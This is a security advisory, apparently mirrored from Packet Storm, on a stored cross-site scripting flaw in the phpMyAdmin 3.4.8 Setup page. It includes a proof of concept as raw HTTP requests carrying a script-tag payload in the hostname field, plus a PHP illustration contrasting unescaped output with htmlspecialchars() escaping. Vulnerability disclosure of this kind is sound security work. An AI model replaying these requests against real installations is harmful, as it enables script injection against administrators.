phpMyAdmin 3.4.8 Cross Site Scripting

2011-12-22T00:00:00
ID PACKETSTORM:108110
Type packetstorm
Reporter Jason Leyrer
Modified 2011-12-22T00:00:00

Description

                                        
Trustwave's SpiderLabs Security Advisory TWSL2011-019:  
Cross-Site Scripting Vulnerability in phpMyAdmin  
  
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-019.txt  
  
Published: 12/22/11  
Version: 1.0  
  
Vendor: phpMyAdmin (http://www.phpmyadmin.net/)  
Product: phpMyAdmin  
Version affected: 3.4.8 and prior  
  
Product description:  
An open source tool developed in PHP to manage and administer MySQL  
databases remotely. The web browser interface allows creating, modifying  
or deleting databases, tables, fields or rows, executing SQL statements,  
and other database functions.  
  
Credit: Jason Leyrer of Trustwave SpiderLabs  
  
Finding 1: Cross-Site Scripting (XSS) Vulnerability in Setup Interface  
CVE: CVE-2011-4782  
  
Affected versions of phpMyAdmin do not sanitize user-supplied server names  
before displaying them in its Setup Overview. This allows remote attackers  
to execute arbitrary web scripts or HTML via a crafted request.  
  
phpMyAdmin allows users to add database servers via its Setup interface.  
Since phpMyAdmin doesn't do any input validation on server hostnames when  
they are entered, it is up to whatever displays these names throughout the  
application to use htmlspecialchars() (or similar) to sanitize them.  
  
phpMyAdmin uses a function called perform_config_checks() to perform a  
series of compatibility, security and consistency checks on application  
configuration options. If it finds settings that are contrary to best  
practices, perform_config_checks() generates messages to be displayed to  
users at the top of the Setup Overview page. The messages generated for  
some of these configuration options ($cfg['Servers'][$i]['ssl'],  
$cfg['Servers'][$i]['extension'], $cfg['Servers'][$i]['auth_type'],  
$cfg['Servers'][$i]['AllowRoot'], and  
$cfg['Servers'][$i]['AllowNoPassword']) are constructed using user-supplied  
hostnames without any sanitization taking place. This can lead to web  
script being executed when the Setup Overview page is loaded.  
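The following is an added illustration in PHP, not phpMyAdmin's own code: it reproduces the message-construction pattern the advisory describes, once with the hostname interpolated directly and once passed through htmlspecialchars(), and adds the input-time hostname check that the setup script lacked. The server array is a constructed sample, and the notice markup mirrors the advisory's example output.

```php
<?php
// Added example, not phpMyAdmin's own code. Constructed sample config: one
// entry uses the script-tag "hostname" from the advisory, one a normal host.
$servers = [
    1 => ['host' => "<script>alert('XSS');</script>", 'ssl' => false],
    2 => ['host' => 'db.internal.example', 'ssl' => false],
];

// Vulnerable pattern: the user-supplied host name is concatenated straight
// into the HTML of the Setup Overview notice, so markup in it is rendered.
function notice_unsafe(int $i, array $server): string {
    return '<div class="notice" id="Servers/' . $i . '/ssl"><h4>Use SSL ('
        . $server['host'] . ')</h4>You should use SSL connections if your '
        . 'web server supports it.</div>';
}

// Hardened pattern: every user-controlled value is escaped with
// htmlspecialchars() (ENT_QUOTES, explicit charset) at the point of output.
function notice_safe(int $i, array $server): string {
    $host = htmlspecialchars($server['host'], ENT_QUOTES, 'UTF-8');
    return '<div class="notice" id="Servers/' . $i . '/ssl"><h4>Use SSL ('
        . $host . ')</h4>You should use SSL connections if your '
        . 'web server supports it.</div>';
}

// Defence in depth: accept only IP literals or RFC 1123-style host names when
// a server is added, so markup never reaches the stored configuration.
function is_valid_host(string $host): bool {
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    $label = '(?!-)[A-Za-z0-9-]{1,63}(?<!-)';
    return strlen($host) <= 253
        && preg_match('/^' . $label . '(\.' . $label . ')*$/', $host) === 1;
}

foreach ($servers as $i => $server) {
    if ($server['ssl']) {
        continue;
    }
    echo "Unsafe:   ", notice_unsafe($i, $server), "\n";
    echo "Escaped:  ", notice_safe($i, $server), "\n";
    echo "Validate: ", is_valid_host($server['host']) ? 'accepted' : 'rejected', "\n";
}
```

Run with the PHP CLI; the first server's unsafe notice contains a live script tag, its escaped notice contains only entity-encoded text, and the validator rejects it while accepting the second host.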
  
The following is a Proof of Concept (PoC):  
  
1. Request the Setup interface's index page in order to obtain the  
phpMyAdmin cookie and the value of 'token', which appears in the response  
body:  
  
Request  
-------  
GET /phpmyadmin/setup/index.php HTTP/1.1  
  
Response  
--------  
HTTP/1.1 200 OK  
Date: Thu, 01 Dec 2011 16:42:17 GMT  
Server: Apache/2.2.20 (Ubuntu)  
X-Powered-By: PHP/5.3.6-13ubuntu3.2  
Set-Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; path=/phpmyadmin/setup/; HttpOnly  
Expires: Thu, 01 Dec 2011 16:42:17 GMT  
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0  
Last-Modified: Thu, 01 Dec 2011 16:42:17 GMT  
Set-Cookie: pma_lang=en; expires=Sat, 31-Dec-2011 16:42:17 GMT; path=/phpmyadmin/setup/; httponly  
X-Frame-Options: SAMEORIGIN  
X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net  
Pragma: no-cache  
Vary: Accept-Encoding  
Content-Length: 7722  
Content-Type: text/html; charset=utf-8  
  
---snip---  
  
<input type="hidden" name="token" value="5acce3a965bbe9d42ce50bdf3d491ed9" />  
  
  
2. Input javascript (%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E) to  
the 'Servers-0-host' input field in Add New Server mode, as shown in the  
postdata of the following request:  
  
  
Request  
-------  
POST /phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server HTTP/1.1  
Host: A.B.C.D  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Proxy-Connection: keep-alive  
Referer: http://A.B.C.D/phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server  
Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 1430  
  
tab_hash=&check_page_refresh=1&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&Servers-0-verbose=&Servers-0-host=%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&Servers-0-port=&Servers-0-socket=&Servers-0-connect_type=tcp&Servers-0-extension=mysqli&submit_save=Save&Servers-0-auth_type=cookie&Servers-0-user=root&Servers-0-password=&Servers-0-auth_swekey_config=&Servers-0-auth_http_realm=&Servers-0-SignonSession=&Servers-0-SignonURL=&Servers-0-LogoutURL=&Servers-0-only_db=&Servers-0-only_db-userprefs-allow=on&Servers-0-hide_db=&Servers-0-hide_db-userprefs-allow=on&Servers-0-AllowRoot=on&Servers-0-DisableIS=on&Servers-0-AllowDeny-order=&Servers-0-AllowDeny-rules=&Servers-0-ShowDatabasesCommand=SHOW+DATABASES&Servers-0-pmadb=&Servers-0-controluser=&Servers-0-controlpass=&Servers-0-verbose_check=on&Servers-0-bookmarktable=&Servers-0-relation=&Servers-0-userconfig=&Servers-0-table_info=&Servers-0-column_info=&Servers-0-history=&Servers-0-tracking=&Servers-0-table_coords=&Servers-0-pdf_pages=&Servers-0-designer_coords=&Servers-0-tracking_default_statements=CREATE+TABLE%2CALTER+TABLE%2CDROP+TABLE%2CRENAME+TABLE%2CCREATE+INDEX%2CDROP+INDEX%2CINSERT%2CUPDATE%2CDELETE%2CTRUNCATE%2CREPLACE%2CCREATE+VIEW%2CALTER+VIEW%2CDROP+VIEW%2CCREATE+DATABASE%2CALTER+DATABASE%2CDROP+DATABASE&Servers-0-tracking_add_drop_view=on&Servers-0-tracking_add_drop_table=on&Servers-0-tracking_add_drop_database=on  
  
  
3. View unsanitized script tags on the Setup overview page:  
  
Request  
-------  
GET /phpmyadmin/setup/index.php HTTP/1.1  
Host: A.B.C.D  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Proxy-Connection: keep-alive  
Referer: http://A.B.C.D/phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf&tab_hash=&check_page_refresh=1&lang=en&collation_connection=utf8_general_ci&token=5acce3a965bbe9d42ce50bdf3d491ed9&page=servers&mode=add&submit=New+server  
Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en  
  
Response  
--------  
HTTP/1.1 200 OK  
Date: Thu, 01 Dec 2011 16:44:18 GMT  
Server: Apache/2.2.20 (Ubuntu)  
X-Powered-By: PHP/5.3.6-13ubuntu3.2  
Expires: Thu, 01 Dec 2011 16:44:18 GMT  
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0  
Last-Modified: Thu, 01 Dec 2011 16:44:18 GMT  
X-Frame-Options: SAMEORIGIN  
X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net  
Pragma: no-cache  
Vary: Accept-Encoding  
Content-Length: 7852  
Content-Type: text/html; charset=utf-8  
  
---snip---  
  
<div class="notice" id="Servers/1/ssl"><h4>Use SSL (<script>alert('XSS');</script>)</h4>You should use SSL connections if your web server supports it.</div>  
  
Please note that valid database credentials are not required to exploit  
this vulnerability.  
  
  
Remediation Steps:  
phpMyAdmin version 3.4.9 includes a fix for this security issue. Apply  
the appropriate vendor updates for this product or upgrade to a current and  
secure version of phpMyAdmin.  
  
  
Revision History:  
12/7/11 - Vulnerability disclosed  
12/21/11 - Patch released by vendor  
12/22/11 - Advisory published  
  
  
About Trustwave:  
Trustwave is the leading provider of on-demand and subscription-based  
information security and payment card industry compliance management  
solutions to businesses and government entities throughout the world. For  
organizations faced with today's challenging data security and compliance  
environment, Trustwave provides a unique approach with comprehensive  
solutions that include its flagship TrustKeeper compliance management  
software and other proprietary security solutions. Trustwave has helped  
thousands of organizations--ranging from Fortune 500 businesses and large  
financial institutions to small and medium-sized retailers--manage  
compliance and secure their network infrastructure, data communications and  
critical information assets. Trustwave is headquartered in Chicago with  
offices throughout North America, South America, Europe, Africa, China and  
Australia. For more information, visit https://www.trustwave.com  
  
About Trustwave's SpiderLabs:  
SpiderLabs(R) is the advanced security team at Trustwave focused on  
application security, incident response, penetration testing, physical  
security and security research. The team has performed over a thousand  
incident investigations, thousands of penetration tests and hundreds of  
application security tests globally. In addition, the SpiderLabs Research  
team provides intelligence through bleeding-edge research and proof of  
concept tool development to enhance Trustwave's products and services.  
https://www.trustwave.com/spiderlabs  
  
Disclaimer:  
The information provided in this advisory is provided "as is" without  
warranty of any kind. Trustwave disclaims all warranties, either express or  
implied, including the warranties of merchantability and fitness for a  
particular purpose. In no event shall Trustwave or its suppliers be liable  
for any damages whatsoever including direct, indirect, incidental,  
consequential, loss of business profits or special damages, even if  
Trustwave or its suppliers have been advised of the possibility of such  
damages. Some states do not allow the exclusion or limitation of liability  
for consequential or incidental damages so the foregoing limitation may not  
apply.  
  
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.  
  